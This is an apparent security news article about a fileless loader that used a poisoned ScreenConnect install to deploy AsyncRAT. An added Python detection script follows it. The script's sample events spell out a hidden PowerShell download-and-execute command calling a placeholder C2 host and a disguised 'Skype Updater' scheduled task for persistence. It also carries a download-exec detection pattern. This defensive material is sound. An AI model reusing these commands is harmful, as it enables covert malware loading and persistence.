The first “fileless worm” on the internet plagued organizations in 2001. A new report from LevelBlue shines a spotlight on AsyncRAT, which is also anything but new and continues to cause problems without carrying any files.
LevelBlue’s SOC team has detected a fileless loader used to deploy AsyncRAT. AsyncRAT is one of the most popular examples of Malware-as-a-Service; attacks mainly target critical infrastructure in the US. It is a tool for remotely controlling devices. It disguises itself as a trusted utility and therefore regularly remains undetected. LevelBlue’s most interesting discovery is not about the malware itself, but the way it ends up on devices.
ScreenConnect
The legitimate RMM tool ScreenConnect was abused by the attackers in the incident highlighted by LevelBlue. The installation included the means to deploy AsyncRAT, but without separate files. After the poisoned version of ScreenConnect was installed, a VBScript and PowerShell loader followed, which quietly ran components fetched from external URLs. Only the VBS files touched the disk; the malware itself stayed in RAM.
The payloads were loaded into the endpoint’s memory via malicious URLs. In other words, there was no file present to betray the attack. AsyncRAT’s targets were passwords and crypto wallets, so the attacker had a financial motive for the compromise.
Whenever the malware needed to be relaunched, this was done through the malicious “Skype Updater,” an app that Microsoft no longer uses. Even so, unsuspecting users are unlikely to read this background activity as a sign that something is wrong.
Encrypted
The secret reinstallation, the key to the long-term existence of this version of AsyncRAT, takes place via an encrypted string. During runtime, this is decrypted and the malware is told to reinstall itself if necessary. The normally hidden %AppData% within Windows serves as a safe hiding place.
In its report, LevelBlue manages to dissect every component of the loader and AsyncRAT. This also reveals how the attacker can be blocked. Apart from the now familiar C2 domains, behavioral patterns of the malicious ScreenConnect implementation are also known, enabling security companies to improve detection.
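The behavioral chain described above (ScreenConnect spawning a script host, VBScript handing off to PowerShell that fetches and runs code from a URL, and a scheduled task pointing into %AppData%) can be expressed as a handful of process-creation rules. The following is an added illustration, not code from LevelBlue or from the report; the events are constructed in a Sysmon-like shape, and the ScreenConnect process names, the task name and the URL are assumptions for the sample.

```python
import ntpath
import re

# Constructed sample process-creation events in a Sysmon-like shape; they are
# illustrative and not taken from the LevelBlue report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //B "C:\Users\u\AppData\Roaming\Update.vbs"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2.example.invalid/stage')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /tn "Skype Updater" /sc onlogon '
                '/tr "wscript.exe C:\\Users\\u\\AppData\\Roaming\\Update.vbs"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Assumed ScreenConnect client binaries; adjust to what your RMM deployment actually runs.
RMM_IMAGES = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Command-line fragments typical of loaders that pull a stage over HTTP and run it in memory.
DOWNLOAD_EXEC = re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biex\b|invoke-expression", re.I)


def base(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def classify(ev):
    """Return the names of every rule a single process-creation event trips."""
    parent, image, cmd = base(ev["parent"]), base(ev["image"]), ev["cmdline"]
    hits = []
    if parent in RMM_IMAGES and image in SCRIPT_HOSTS:
        hits.append("rmm_spawns_script_host")
    if parent in {"wscript.exe", "cscript.exe"} and image in {"powershell.exe", "pwsh.exe"} \
            and DOWNLOAD_EXEC.search(cmd):
        hits.append("vbs_to_powershell_remote_fetch")
    if image == "schtasks.exe" and "/create" in cmd.lower() and "appdata" in cmd.lower():
        hits.append("scheduled_task_runs_from_appdata")
    return hits


def triage(events):
    """Map event index -> rules hit, keeping only events that tripped at least one rule."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}


if __name__ == "__main__":
    for i, rules in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"][:60], "->", rules)
```

Each rule alone is noisy on a fleet that legitimately scripts through its RMM; the value is in correlating them on one host within a short window.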